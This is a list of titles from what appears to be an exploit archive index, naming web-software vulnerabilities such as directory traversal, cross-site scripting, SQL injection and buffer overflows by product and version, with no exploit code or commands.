[23878] HP Web Jetadmin 7.5.2456 Printer Firmware Update Script Arbitrary File Upload Weakness [23875] Trend Micro Interscan Viruswall localweb Directory Traversal Vulnerability [23864] xweb 1.0 - Directory Traversal vulnerability [23837] IBM Lotus Domino 6.5.1 HTTP webadmin.nsf Quick Console Cross-Site Scripting Vulnerability [23836] IBM Lotus Domino 6/7 HTTP webadmin.nsf Directory Traversal Vulnerability [23810] Emumail EMU Webmail 5.2.7 emumail.fcgi Multiple Parameter XSS [23809] Emumail EMU Webmail 5.2.7 nit.emu Information Disclosure [23803] Pegasi Web Server 0.2.2 Error Page XSS [23802] Pegasi Web Server 0.2.2 Arbitrary File Access [23794] PWebServer 0.3.x Remote Directory Traversal Vulnerability [23789] SureCom EP-9510AX/EP-4504AX Network Device Malformed Web Authorization Request Denial of Service Vulnerability (2) [23788] SureCom EP-9510AX/EP-4504AX Network Device Malformed Web Authorization Request Denial of Service Vulnerability (1) [23776] Software602 602Pro LAN Suite Web Mail Cross-Site Scripting Vulnerability [23758] gweb http server 0.5/0.6 - Directory Traversal vulnerability [23741] Proxy-Pro Professional GateKeeper 4.7 Web Proxy Buffer Overrun Vulnerability [23729] WebCortex WebStores2000 Error.ASP Cross-Site Scripting Vulnerability [23717] Microsoft Windows XP Help And Support Center Interface Spoofing Weakness [23713] Vizer Web Server 1.9.1 - Remote Denial of Service Vulnerability [23677] MaxWebPortal 1.3x Personal Message SendTo Parameter XSS [23676] MaxWebPortal 1.3x down.asp HTTP_REFERER XSS [23648] Web Crossing Web Server 4.0/5.0 Component Remote Denial of Service Vulnerability [23629] Leif M. Wright Web Blog 1.1 - Remote Command Execution Vulnerability [23613] Leif M. Wright Web Blog 1.1 File Disclosure Vulnerability [23612] BRS WebWeaver 1.0.7 ISAPISkeleton.dll Cross-Site Scripting Vulnerability [23604] Antologic Antolinux 1.0 Administrative Interface NDCR Parameter Remote Command Execution [23597] borland web server for corel paradox 1.0 b3 - Directory Traversal vulnerability [23590] Reptile Web Server Reptile Web Server 20020105 Denial of Service Vulnerability [23589] Novell Netware Enterprise Web Server 5.1/6.0 - Multiple XSS Vulnerabilities [23588] Novell Netware Enterprise Web Server 5.1/6.0 SnoopServlet Information Disclosure [23587] Novell Netware Enterprise Web Server 5.1/6.0 snoop.jsp Information Disclosure [23586] Novell Netware Enterprise Web Server 5.1/6.0 env.bas Information Disclosure [23563] Darkwet Network WebcamXP 1.6.945 Cross-Site Scripting Vulnerability [23557] aiptek netcam webserver 0.93.15 - Directory Traversal vulnerability [23556] GetWare Web Server Component Content-Length Value Remote Denial of Service Vulnerability [23555] GoAhead WebServer 2.1.x Directory Management Policy Bypass Vulnerability [23546] phpShop Web Shopping Cart 0.6.1 -b Multiple Function XSS [23535] DansGuardian Webmin Module 0.x Edit.CGI Remote Directory Traversal Vulnerability [23534] Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb CreateFile Function Denial of Service Vulnerability [23532] Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb Directory Traversal Vulnerability [23528] Edimax AR-6004 ADSL Router Management Interface Cross-Site Scripting Vulnerability [23527] ZyXEL ZyWALL 10 Management Interface Cross-Site Scripting Vulnerability [23514] Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server Buffer Overflow Vulnerability [23513] Athena Web Registration Remote Command Execution Vulnerability [23500] InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow [23474] Webfroot Shoutbox 2.32 Viewshoutbox.PHP Cross-Site Scripting Vulnerability [23461] dcam webcam server personal web server 8.2.5 - Directory Traversal vulnerability [23451] PY Software Active Webcam 4.3 Webserver Cross-Site Scripting Vulnerability [23450] PY Software Active Webcam 4.3 Webserver Directory Traversal Vulnerability [23449] Xerox MicroServer Web Server Remote Directory Traversal Vulnerability [23446] GoAhead Webserver 2.1.x ASP Script File Source Code Disclosure Vulnerability [23421] calacode @mail webmail system 3.52 - Multiple Vulnerabilities [23419] Abyss Web Server 1.0/1.1 Authentication Bypass Vulnerability [23418] Webgate WebEye Information Disclosure Vulnerability [23411] Websense Enterprise 4/5 Blocked Sites Cross-Site Scripting Vulnerability [23402] Macromedia JRun 4.0 build 61650 Administrative Interface Multiple Cross-Site Scripting Vulnerabilities [23387] netserve web server 1.0.7 - Directory Traversal vulnerability [23381] phpWebFileManager 2.0 index.php Directory Traversal Vulnerability [23380] WebWasher Classic 2.2/3.3 Error Message Cross-Site Scripting Vulnerability [23379] FortiGate Firewall 2.x selector Admin Interface XSS [23378] FortiGate Firewall 2.x listdel Admin Interface XSS [23377] FortiGate Firewall 2.x Policy Admin Interface XSS [23376] FortiGate Firewall 2.x dlg Admin Interface XSS [23373] Opera Web Browser 7.x URI Handler Directory Traversal Vulnerability [23365] telcondex simplewebserver 2.13.31027 build 3289 - Directory Traversal vulnerability [23334] IA WebMail Server 3.0/3.1 Long GET Request Buffer Overrun Vulnerability [23331] Web Wiz Forum 6.34/7.0/7.5 Unauthorized Private Forum Access Vulnerability [23325] BRS WebWeaver 1.06 httpd `User-Agent` Remote Denial of Service Vulnerability [23318] Ashley Brown iWeb Server Encoded Backslash Directory Traversal Vulnerability [23315] BEA WebLogic 6/7/8 InteractiveQuery.jsp Cross-Site Scripting Vulnerability [23312] BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 Input Validation Vulnerability [23310] TelCondex SimpleWebserver 2.12.30210 build 3285 HTTP Referer Remote Buffer Overflow Vulnerability [23291] Opera Web Browser 7 IFRAME Zone Restriction Bypass Vulnerability [23271] PSCS VPOP3 2.0 Email Server WebAdmin Cross-Site Scripting Vulnerability [23222] File Sharing Software Easy File Sharing Web Server 1.2 Information Disclosure Vulnerability [23209] mutant penguin mpweb pro 1.1.2 - Directory Traversal vulnerability [23196] WebFS 1.x Long Pathname Buffer Overrun Vulnerability [23191] Savant Web Server 3.1 Page Redirect Denial of Service Vulnerability [23166] Plug And Play Web Server 1.0 002c FTP Service Command Handler Buffer Overflow Vulnerabilities [23157] Plug and Play Web Server 1.0 002c Directory Traversal Vulnerability [23152] Yahoo! Webcam ActiveX Control 2.0 .0.107 Buffer Overrun Vulnerability [23136] futurewave webx server 1.1 - Directory Traversal vulnerability [23120] ICQ 2003 Webfront guestbook Cross-Site Scripting Vulnerability [23107] Opera Web Browser 12.11 Crash PoC [23102] FoxWeb 2.5 PATH_INFO Remote Buffer Overrun Vulnerability [23099] WebCalendar 0.9.x Multiple Module SQL Injection Vulnerabilities [23098] WebCalendar 0.9.x week.php user XSS [23097] WebCalendar 0.9.x colors.php color XSS [23087] Check Point Firewall-1 4.x SecuRemote Internal Interface Address Information Leakage Vulnerability [23065] AldWeb MiniPortail 1.9/2.x LNG Parameter Cross-Site Scripting Vulnerability [23037] DWebPro 3.4.1 Http.ini Plaintext Password Storage Vulnerability [23017] phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module PDA_limit Parameter XSS [23016] phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module PAGE_id Parameter XSS [23015] phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module fatcat_id Parameter XSS [23014] phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 calendar Module day Parameter XSS [23013] PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module SQL Injection Vulnerabilities [22998] PostNuke 0.6/0.7 web_links Module TTitle Cross-site Scripting Vulnerability [22958] e107 Website System 0.554 HTML Injection Vulnerability [22956] e107 Website System 0.555 DB.PHP Information Disclosure Vulnerability [22949] Novell Netware Enterprise Web Server 5.1/6.0 CGI2Perl.NLM Buffer Overflow Vulnerability [22948] MoreGroupWare 0.6.8 WEBMAIL2_INC_DIR Remote File Include Vulnerability [22947] 3Com DSL Router 812 1.1.7/1.1.9/2.0 Administrative Interface Long Request Router DoS [22945] Savant Webserver 3.1 - Denial of Service Vulnerabilities [22944] Savant Web Server 3.1 CGITest.HTML Cross Site Scripting Vulnerability [22942] WebCalendar 0.9.x Local File Include Information Disclosure Vulnerability [22935] Websense Proxy Filter Bypass [22917] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [22897] Twilight WebServer 1.3.3 .0 GET Request Buffer Overflow Vulnerability [22874] CPanel 5.0/5.3/6.x Admin Interface HTML Injection Vulnerability [22869] Microsoft Outlook 5.5/2000 Web Access HTML Attachment Script Execution Vulnerability [22838] BRS WebWeaver 1.0 Error Page Cross-Site Scripting Vulnerability [22834] Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability (2) [22833] Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability (1) [22829] webid <= 1.0.5 - Directory Traversal [22828] WeBid <= 1.0.5 - Cross Site Scripting Vulnerabilities [22827] Compaq Web-Based Management Agent Remote File Verification Vulnerability [22826] VisNetic WebMail 5.8.6 .6 Information Disclosure Vulnerability [22825] Armida Databased Web Server 1.0 - Remote GET Request Denial of Service Vulnerability [22823] Compaq Web-Based Management Agent Access Violation Denial of Service Vulnerability [22822] Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service Vulnerability [22812] WebJeff Filemanager 1.6 File Disclosure Vulnerability [22807] SurfControl Web Filter 4.2 .0.1 File Disclosure Vulnerability [22804] Kerio MailServer 5.6.3 Web Mail DO_MAP Module Cross-Site Scripting Vulnerability [22799] Kerio MailServer 5.6.3 Web Mail ADD_ACL Module Cross-Site Scripting Vulnerability [22795] MiniHTTPServer WebForums Server 1.x/2.0 - Remote Directory Traversal Vulnerability [22769] Methodus 3 Web Server File Disclosure Vulnerability [22759] WebBBS Pro 1.18 - GET Request Denial of Service Vulnerability [22758] silentthought simple web server 1.0 - Directory Traversal vulnerability [22755] Aiglon Web Server 2.0 Installation Path Information Disclosure Weakness [22747] MaxWebPortal 1.30 Remote Database Disclosure [22746] MaxWebPortal 1.30 search.asp Search Parameter XSS [22744] Synkron.Web 3.0 HTML Injection Vulnerability [22731] Mailtraq 2.2 Webmail Utility Path Disclosure Vulnerability [22718] Pi3Web 2.0.2 SortName Buffer Overflow Vulnerability [22716] WebChat 2.0 Users.PHP Cross-Site Scripting Vulnerability [22715] WebChat 2.0 Users.PHP Database Username Disclosure Weakness [22705] Webfroot Shoutbox 2.32 Expanded.PHP Remote Directory Traversal Vulnerability [22704] Webchat 2.0 Module Path Disclosure Weakness [22702] Webfroot Shoutbox 2.32 Expanded.PHP Remote Command Execution Vulnerability [22698] WebCortex WebStores2000 SQL Injection Vulnerability [22687] Webfroot Shoutbox 2.32 Remote Command Execution Vulnerability [22671] Webfroot Shoutbox 2.32 URI Parameter File Disclosure Vulnerability [22670] Microsoft IIS 5 WebDAV PROPFIND and SEARCH Method Denial of Service Vulnerability [22650] BRS WebWeaver 1.0 4 POST and HEAD Denial of Service Vulnerability [22610] Snowblind Web Server 1.0/1.1 HTTP GET Request Buffer Overflow Vulnerability [22609] Snowblind 1.0/1.1 Web Server File Disclosure Vulnerability [22608] Snowblind Web Server 1.0/1.1 Malformed HTTP Request Denial of Service Vulnerability [22598] PHP-Nuke 6.0/6.5 Web_Links Module Path Disclosure Vulnerability [22589] PHPNuke 5.x/6.x Web_Links Module Remote SQL Injection Vulnerability [22587] Pi3Web 2.0.1 Malformed GET Request Denial of Service Vulnerability [22556] MDG Web Server 4D 3.6 HTTP Command Buffer Overflow Vulnerability [22549] AVerCaster Pro RS3400 Web Server Directory Traversal [22542] Alt-N WebAdmin 2.0.x Remote File Disclosure Vulnerability [22541] Alt-N WebAdmin 2.0.x Remote File Viewing Vulnerability [22527] Xeneo Web Server 2.2.10 Undisclosed Buffer Overflow Vulnerability [22522] Web Protector 2.0 Trivial Encryption Weakness [22516] Xeneo Web Server 2.2.9 - Denial of Service Vulnerability [22513] MPCSoftWeb 1.0 Database Disclosure Vulnerability [22507] Web Wiz Forum 6.34 Information Disclosure Vulnerability [22503] TW-WebServer 1.0 - Denial of Service Vulnerability (2) [22502] TW-WebServer 1.0 - Denial of Service Vulnerability (1) [22487] Web Wiz Site News 3.6 Information Disclosure Vulnerability [22460] Abyss Web Server 1.1.2 Incomplete HTTP Request Denial of Service Vulnerability [22456] AutomatedShops WebC 2.0/5.0 Symbolic Link Following Configuration File Weakness [22454] AutomatedShops WebC 2.0/5.0 Script Name Remote Buffer Overrun Vulnerability [22448] BEA WebLogic 7.0 Hostname/NetBIOS Name Remote Information Disclosure Vulnerability [22443] Beanwebb Guestbook 1.0 Unauthorized Administrative Access Vulnerability [22421] Web Chat Manager 2.0 HTML Code Injection Vulnerability [22378] MyAbraCadaWeb 1.0 Path Disclosure Vulnerability [22364] Outblaze Webmail 0 Cookie Authentication Bypass Vulnerability [22360] Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (3) [22359] Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (2) [22358] Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (1) [22328] Dr.Web 4.x Virus Scanner Folder Name Buffer Overflow Vulnerability [22318] Webchat 0.77 Defines.PHP Remote File Include Vulnerability [22300] Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability [22275] Webmin 0.9x,Usermin 0.9x/1.0 Session ID Spoofing Unauthenticated Access Vulnerability [22265] cPanel 5.0 Openwebmail Local Privileges Escalation Vulnerability [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability [22143] BRS WebWeaver 1.0 1 MKDir Directory Traversal Weakness [22129] H-Sphere Webshell 2.4 remote root exploit [22128] H-Sphere Webshell 2.4 - Local Root Exploit [22116] N/X Web Content Management System 2002 Prerelease 1 datasets.php c_path Parameter LFI [22115] N/X Web Content Management System 2002 Prerelease 1 menu.inc.php c_path Parameter RFI [22104] Captaris Infinite WebMail 3.61.5 HTML Injection Vulnerability [22090] PHP-Nuke 6.0 Web Mail Script Injection Vulnerability [22089] PHP-Nuke 6.0 Web Mail Remote PHP Script Execution Vulnerability [22083] Deerfield VisNetic WebSite 3.5.13 .1 Cross Site Scripting Vulnerability [22072] Cobalt RaQ4 Administrative Interface Command Execution Vulnerability [22044] Web Server Creator Web Portal 0.1 - Remote File Include Vulnerability [22041] Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities [22018] keyfocus kf web server 1.0.8 - Directory Traversal vulnerability [22001] Simple Web Server 0.5.1 File Disclosure Vulnerability [21982] Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service Vulnerability [21949] IBM Websphere Caching Proxy 3.6/4.0 - Denial of Service Vulnerability [21948] IBM Websphere Edge Server 3.69/4.0 HTTP Header Injection Vulnerability [21947] IBM Websphere Edge Server 3.6/4.0 Cross Site Scripting Vulnerability [21945] PlanetDNS PlanetWeb 1.14 Malformed Request Remote Buffer Overflow Vulnerability [21938] TelCondex SimpleWebServer 2.0.6 - Denial of Service Vulnerability [21935] My Web Server 1.0.1/1.0.2 Long Get Request Denial of Service Vulnerability [21911] Oracle 9i Application Server 9.0.2 Web Cache Administration Tool Denial of Service Vulnerability [21899] PHPWebSite 0.8.3 Article.PHP Cross-Site Scripting Vulnerability [21898] SurfControl SuperScout WebFilter for windows 2000 SQL Injection Vulnerability [21897] SurfControl SuperScout WebFilter for windows 2000 File Disclosure Vulnerability [21877] EmuMail 5.0 Web Root Path Disclosure Vulnerability [21864] PHPWebSite 0.8.3 News Message HTML Injection Vulnerability [21858] ACWeb 1.14/1.8 Cross-Site Scripting Vulnerability [21851] Webmin /file/show.cgi Remote Command Execution [21837] InduSoft Web Studio Arbitrary Upload Remote Code Execution [21825] phpWebsite 0.8.2 PHP File Include Vulnerability [21809] Web Help Desk by SolarWinds - Stored XSS [21801] DB4Web 3.4/3.6 Connection Proxy Vulnerability [21800] DB4Web 3.4/3.6 File Disclosure Vulnerability [21795] PlanetWeb 1.14 Long GET Request Buffer Overflow Vulnerability [21794] Savant Webserver 3.1 File Disclosure Vulnerability [21792] Savant Webserver 3.1 Malformed Content-Length Denial of Service Vulnerability [21775] SWS Simple Web Server 0.0.3/0.0.4/0.1 New Line Denial of Service Vulnerability [21766] FactoSystem Weblog 0.9/1.0/1.1 - Multiple SQL Injection Vulnerabilities [21765] Webmin 0.x RPC Function Privilege Escalation Vulnerability [21735] Abyss Web Server 1.0 Encoded Backslash Directory Traversal Vulnerability [21728] Kerio MailServer 5.0/5.1 Web Mail Multiple Cross Site Scripting Vulnerabilities [21710] MyWebServer 1.0.2 Long HTTP Request HTML Injection Vulnerability [21709] MyWebServer 1.0.2 Search Request Remote Buffer Overflow Vulnerability [21707] GoAhead WebServer 2.1 - Remote Arbitrary Command Execution Vulnerability [21698] BlueFace Falcon Web Server 2.0 Error Message Cross-Site Scripting Vulnerability [21692] MS IE 5/6,Konqueror 2.2.2/3.0,Weblogic Server 5/6/7 Invalid X.509 Certificate Chain [21678] Inso DynaWeb httpd 3.1/4.0.2/4.1 Format String Vulnerability [21673] IPSwitch IMail 6.x/7.0.x Web Calendaring Incomplete Post Denial of Service Vulnerability [21654] IPSwitch IMail 6.x/7.0/7.1 Web Messaging HTTP Get Buffer Overflow Vulnerability [21630] Working Resources 1.7.x BadBlue Administrative Interface Arbitrary File Access [21617] IMHO Webmail 0.9x Account Hijacking Vulnerability [21608] GoAhead WebServer 2.1.x Error Page Cross Site Scripting Vulnerability [21607] GoAhead WebServer 2.1.x URL Encoded Slash Directory Traversal Vulnerability [21603] iPlanet Web Server 4.1 Search Component File Disclosure Vulnerability [21597] Key Focus KF Web Server 1.0.2 Directory Contents Disclosure Vulnerability [21570] BasiliX Webmail 1.1 Message Content Script Injection Vulnerability [21567] WebScripts WebBBS 4.x/5.0 - Remote Command Execution Vulnerability [21562] Wolfram Research webMathematica 4.0 File Disclosure Vulnerability [21542] AnalogX SimpleServer:WWW 1.16 Web Server Buffer Overflow Vulnerability [21515] MS IE 5/6 FTP Web View Cross Site Scripting Vulnerability [21498] Evolvable Shambala Server 4.5 Web Server Denial of Service Vulnerability [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure [21488] Netscape Enterprise Web Server for Netware 4/5 5.0 Information Disclosure [21475] LocalWEB2000 2.1.0 Standard - File Disclosure Vulnerability [21454] Clicky Web Pseudo-frames 1.0 - Remote File Include Vulnerability [21449] NOCC 0.9.x Webmail Script Injection Vulnerability [21435] askSam 4.0 Web Publisher Cross Site Scripting Vulnerability [21432] BEA Systems WebLogic Server and Express 7.0 Null Character DoS [21387] WebTrends Reporting Center for Windows 4.0 d GET Request Buffer Overflow [21374] IBM Informix Web Datablade 4.1x Page Request SQL Injection Vulnerability [21367] Abyss Web Server 1.0 File Disclosure Vulnerability [21349] PHP Nuke 5.x Error Message Web Root Disclosure Vulnerability [21348] Webmin 0.x Script Code Input Validation Vulnerability [21330] Netsweeper WebAdmin Portal Multiple Vulnerabilities [21327] webERP <= 4.08.4 - WorkOrderEntry.php SQL Injection Vulnerability [21306] Galacticomm Worldgroup 3.20 Remote Web Server Denial of Service Vulnerability [21298] Essentia Web Server 2.1 Long URL Buffer Overflow Vulnerability [21294] Phusion Webserver 1.0 Long URL Buffer Overflow Vulnerability [21293] Phusion Webserver 1.0 Long URL Denial of Service Vulnerability [21292] phusion webserver 1.0 - Directory Traversal vulnerability (2) [21291] phusion webserver 1.0 - Directory Traversal vulnerability (1) [21271] Webify Photo Gallery Arbitrary File Deletion Vulnerability [21270] Webify Business Directory Arbitrary File Deletion Vulnerability [21269] Webify eDownloads Cart Arbitrary File Deletion Vulnerability [21250] Webify Blog Arbitrary File Deletion Vulnerability [21239] Caldera UnixWare 7.1.1 WebTop SCOAdminReg.CGI Arbitrary Command Execution Vulnerability [21237] Cyberstop Web Server 0.1 Long Request DoS Vulnerability [21225] John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability [21212] Cacheflow CacheOS 3.1/4.0 Web Administration Arbitrary Cached Page Code Leakage Vulnerability [21202] Anti-Web HTTPD 2.2 Script Engine File Opening Denial of Service Vulnerability [21183] webmin 0.91 - Directory Traversal vulnerability [21160] ibm informix web datablade 3.x/4.1 - Directory Traversal vulnerability [21127] Microsoft Internet Explorer 5/6 JavaScript Interface Spoofing Vulnerability [21125] Mountain Network Systems WebCart 8.4 Command Execution Vulnerability [21121] Oracle9iAS Web Cache 2.0 - Buffer Overflow Vulnerability [21078] Respondus for WebCT 1.1.2 Weak Password Encryption Vulnerability [21068] SIX-webboard 2.01 File Retrieval Vulnerability [21017] Squid Web Proxy 2.3 Reverse Proxy Vulnerability [20996] Basilix Webmail 1.0 File Disclosure Vulnerability [20995] cobalt qube webmail 1.0 - Directory Traversal vulnerability [20987] Citrix Nfuse 1.51 Webroot Disclosure Vulnerability [20940] Tarantella Enterprise 3 3.x TTAWebTop.CGI Arbitrary File Viewing Vulnerability [20918] Wordpress HD Webplayer 1.1 - SQL Injection Vulnerability [20916] cgiCentral WebStore 400 Arbitrary Command Execution Vulnerability [20914] cgiCentral WebStore 400 Administrator Authentication Bypass Vulnerability [20896] OReilly Software WebBoard 4.10.30 Pager Hostile JavaScript Vulnerability [20895] WebTrends Enterprise Reporting Server 3.1 c/3.5 Source Code Disclosure [20876] Simple Web Server 2.2-rc2 ASLR Bypass Exploit [20857] web@all CMS 2.0 - Multiple Vulnerabilities [20855] Wiki Web Help 0.3.9 - Multiple Stored XSS Vulnerabilities [20854] IIS 5.0 WebDav Lock Method Memory Leak DoS Vulnerability [20853] iPlanet 4.1 Web Publisher Remote Buffer Overflow Vulnerability (2) [20852] iPlanet 4.1 Web Publisher Remote Buffer Overflow Vulnerability (1) [20844] Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote DoS Vulnerability [20819] BRS WebWeaver 0.x FTP Root Path Disclosure Vulnerability [20809] Excite for Web Servers 1.1 Administrative Password Vulnerability [20807] datawizard webxq 2.1.204 - Directory Traversal vulnerability [20806] Tektronix Phaser 740/750/850/930 Network Printer Administration Interface Vulnerability [20801] PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (3) [20800] PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (2) [20799] PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (1) [20797] Perl Web Server 0.x Path Traversal Vulnerability [20793] RobTex Viking Server 1.0.7 Relative Path Webroot Escaping Vulnerability [20780] CrossWind CyberScheduler 2.1 websyncd remote Buffer Overflow Vulnerability [20770] GoAhead Software GoAhead Webserver (Windows) 2.1 - Denial of Service [20763] Microsoft ISA Server 2000 Web Proxy DoS Vulnerability [20762] webpa <= 1.1.0.1 - Multiple Vulnerabilities [20753] IBM Websphere/Net.Commerce 3 CGI-BIN Macro Denial of Service Vulnerability [20719] Tomcat 3.2.1/4.0,Weblogic Server 5.1 URL JSP Request Source Code Disclosure Vulnerability [20707] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change [20706] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change (MSF) [20687] OReilly Software WebSite Professional 2.5.4 Directory Disclosure Vulnerability [20685] IBM Net.Commerce 3.1/3.2 WebSphere Weak Password Vulnerability [20682] Michael Lamont Savant Web Server 3.0 DoS Vulnerability [20681] Baltimore Technologies WEBsweeper 4.0 DoS Vulnerability [20675] uebimiau webmail 2.7.2 - Stored XSS [20672] Hivemail Webmail Multiple Stored XSS Vulnerabilities [20669] GWebmail 0.7.3 XSS & LFI RCE Vulnerabilities [20668] hupa webmail 0.0.2 - Stored XSS [20665] T-dah Webmail CSRF & Stored XSS [20664] Microsoft IIS 5.0 WebDAV Denial of Service Vulnerability [20655] Orange Software Orange Web Server 2.1 DoS Vulnerability [20654] APC WEB/SNMP Management Card (9606) Firmware 3.0 Telnet Administration DoS [20650] Sapio WebReflex 1.55 GET Denial of Service Vulnerability [20638] Bajie Webserver 0.78/0.90 Remote Command Execution Vulnerability [20637] itafrica webactive 1.0 - Directory Traversal vulnerability [20634] John Roy Pi3Web 1.0.1 - Buffer Overflow Vulnerability [20632] PALS Library System WebPALS 1.0 pals-cgi Arbitrary Command Execution [20631] PALS Library System WebPALS 1.0 pals-cgi Traversal Arbitrary File Read [20627] IlohaMail Webmail Stored XSS [20625] SilverPlatter WebSPIRS 3.3.1 File Disclosure Vulnerability [20609] Heat-On HSWeb Web Server 2.0 Path Disclosure Vulnerability [20607] goahead webserver 2.0/2.1 - Directory Traversal vulnerability [20601] iweb hyperseek 2000 - Directory Traversal vulnerability [20585] localweb2000 1.1 - Directory Traversal vulnerability [20580] webid <= 1.0.4 - Multiple Vulnerabilities [20579] T-dah Webmail Multiple Stored XSS [20578] hastymail2 webmail 1.1 rc2 - Stored XSS [20558] Apache 1.2 Web Server DoS Vulnerability [20549] Roundcube Webmail 0.8.0 - Stored XSS [20538] Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability [20534] WebMaster ConferenceRoom 1.8 Developer Edition DoS Vulnerability [20531] IBM HTTP Server 1.3 AfpaCache/WebSphereNet.Data DoS Vulnerability [20527] Informix Webdriver 1.0 - Remote Administration Access Vulnerability [20516] BEA Systems Weblogic Server 4.0 x/4.5 x/5.1 x Double Dot Buffer Overflow [20484] OReilly WebSite 1.x/2.0 win-c-sample.exe Buffer Overflow Vulnerability [20483] WEBgais 1.0 websendmail Remote Command Execution Vulnerability [20482] Novell Netware Web Server 3.x files.pl Vulnerability [20478] IBM WebSphere MQ File Transfer Edition Web Gateway Insufficient Access Control [20477] IBM WebSphere MQ File Transfer Edition Web Gateway CSRF Vulnerability [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability [20465] Squid Web Proxy 2.2 cachemgr.cgi Unauthorized Connection Vulnerability [20463] WEBgais 1.0 - Remote Command Execution Vulnerability [20450] Trlinux Postaci Webmail 1.1.3 Password Disclosure Vulnerability [20449] GlimpseHTTP 1.0/2.0 and WebGlimpse 1.0 Piped Command Vulnerability [20448] Novell NetWare Web Server 2.x convert.bas Vulnerability [20447] WebCom datakommunikation Guestbook 0.1 rguest.exe Arbitrary File Access [20446] WebCom datakommunikation Guestbook 0.1 wguest.exe Arbitrary File Access [20445] IIS 1.0,Netscape Server 1.0/1.12,OReilly WebSite Professional 1.1 b BAT/.CMD Remote Command Execution [20432] Network Associates WebShield SMTP 4.5 Invalid Outgoing Recipient Field DoS Vulnerability [20379] Apple WebObjects Developer NT4 IIS4.0 CGI-adapter 4.5 Developer Remote Overflow [20375] Sun Java Web Server 1.1 Beta Viewable .jhtml Source Vulnerability [20370] Kootenay Web Inc whois 1.0 - Remote Command Execution Vulnerability [20366] winwebmail server 3.8.1.6 - Stored XSS [20364] t-dah webmail client 3.2.0-2.3 - Stored XSS [20346] Inout Mobile Webmail APP Persistent XSS Vulnerability [20280] bytes interactive web shopper 1.0/2.0 - Directory Traversal vulnerability [20279] extropia webstore 1.0/2.0 - Directory Traversal vulnerability [20274] IBM WebSphere 2.0/3.0 ikeyman Weak Encrypted Password Vulnerability [20246] TalentSoft Web+ Application Server (Linux) 4.6 Example Script File Disclosure [20245] TalentSoft Web+ Client/Monitor/server 4.6 Source Code Disclosure Vulnerability [20244] TalentSoft Web+ Client/Monitor/server 4.6 Internal IP Address Disclosure [20229] IBM Websphere Application Server 3.0.2 Server Plugin DoS Vulnerability [20224] CamShot WebCam 2.6 Trial - Remote Buffer Overflow [20219] WebTV for Windows 98/ME DoS Vulnerability [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability [20173] WebPageTest Arbitrary PHP File Upload [20144] Sun AnswerBook2 1.4.2/1.4.3/1.4.4 Administration Interface Access [20125] Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution [20124] Dr. Web Control Center 6.00.3.201111300 XSS Vulnerability [20123] Symantec Web Gateway 5.0.3.18 (deptUploads_data.php groupid parameter) Blind SQLi [20113] Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection [20104] Roxen WebServer 2.0 .X %00 Request File/Directory Disclosure Vulnerability [20097] IBM Websphere Application Server 2.0./3.0/3.0.2 .1 Showcode Vulnerability [20095] Sun Java Web Server 1.1.3/2.0 Servlets Vulnerability [20088] Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit [20086] OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 'webfind.exe' Buffer Overflow [20073] "CVSWeb Developer CVSWeb 1.80 insecure perl ""open"" Vulnerability" [20066] Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow Vulnerability [20064] Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit [20054] West Street Software LocalWEB HTTP Server 1.2 - Buffer Overflow [20044] Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers [20038] Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection [20037] Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure [20028] Simple Web Server Connection Header Buffer Overflow [20027] BEA Systems WebLogic Express 3.1.8/4/5 Source Code Disclosure [19995] Michael Lamont Savant WebServer 2.1 CGI Source Code Disclosure [19986] Oxide Webserver 2.0.4 - Denial of Service Vulnerability [19976] Concatus IMate Web Mail Server 2.5 - Buffer Overflow Vulnerability [19951] QuickCommerce 2.5/3.0,Cart32 2.5 a/3.0,Shop Express 1.0,StoreCreator 3.0 Web Shopping Cart Hidden Form Field Vulnerability [19949] Gauntlet Firewall 4.1/4.2/5.0,WebShield E-ppliance 100.0/300.0,IRIX 6.5.x Remote Buffer Overflow [19937] Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit [19893] L-Soft Listserv 1.8 Web Archives Buffer Overflow Vulnerability [19877] 